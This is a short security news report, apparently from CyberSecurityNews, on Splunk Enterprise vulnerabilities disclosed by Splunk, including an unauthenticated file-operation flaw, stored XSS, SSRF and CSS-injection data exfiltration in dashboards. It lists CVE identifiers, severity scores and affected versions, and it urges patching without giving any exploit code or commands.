Splunk has disclosed multiple vulnerabilities in its Enterprise platform, some of which are critical and could allow remote attackers to execute malicious scripts, exfiltrate sensitive data, and perform unauthorized file operations.
Critical Vulnerabilities Identified
The most severe issue, identified as CVE-2026-20253 with a CVSS score of 9.8, affects Splunk Enterprise versions below 10.2.4 and 10.0.7. This vulnerability arises from missing authentication controls in a PostgreSQL sidecar service endpoint, enabling unauthenticated attackers to create or truncate arbitrary files. Such exploitation could lead to full system compromise, data destruction, or the persistence of malicious code without requiring user interaction.
Another high-severity vulnerability, CVE-2026-20258 (CVSS 7.1), involves stored cross-site scripting (XSS) in classic dashboards. A low-privileged user can inject malicious JavaScript into dashboard HTML panels, which executes in the victim’s browser when they view the dashboard. Exploitation requires social engineering, as attackers must trick users into opening a crafted request.
Additional Vulnerabilities and Mitigations
Splunk also addressed a server-side request forgery (SSRF) vulnerability, CVE-2026-20252 (CVSS 7.6), in the Dashboard Studio PDF export feature. This flaw allows attackers to send requests to internal systems by bypassing domain validation using crafted subdomains or redirect chains, potentially exposing internal services or sensitive data.
Several medium-severity vulnerabilities (CVE-2026-20254, CVE-2026-20255, CVE-2026-20256, and CVE-2026-20257) affect classic dashboards and stem from improper input validation. These issues enable data exfiltration via CSS injection, protocol-relative URLs, and insufficient validation of external content. In these scenarios, attackers with low privileges can craft malicious dashboards that extract sensitive data when accessed by higher-privileged users.
For example, an attacker could create a dashboard containing a hidden request to an external server. When an administrator views the dashboard, sensitive session data or tokens could be silently transmitted to the attacker-controlled domain.
All vulnerabilities primarily impact Splunk Web components and require some level of user interaction or misconfiguration, such as enabling embeddable HTML content or insufficiently restricting trusted domains.
Splunk has released patches to address these vulnerabilities. Users are strongly advised to update their installations to the latest versions to mitigate potential risks.
These vulnerabilities underscore the importance of regular software updates and vigilant security practices. Organizations using Splunk Enterprise should prioritize applying these patches to protect their systems from potential exploits.
Source: CyberSecurityNews
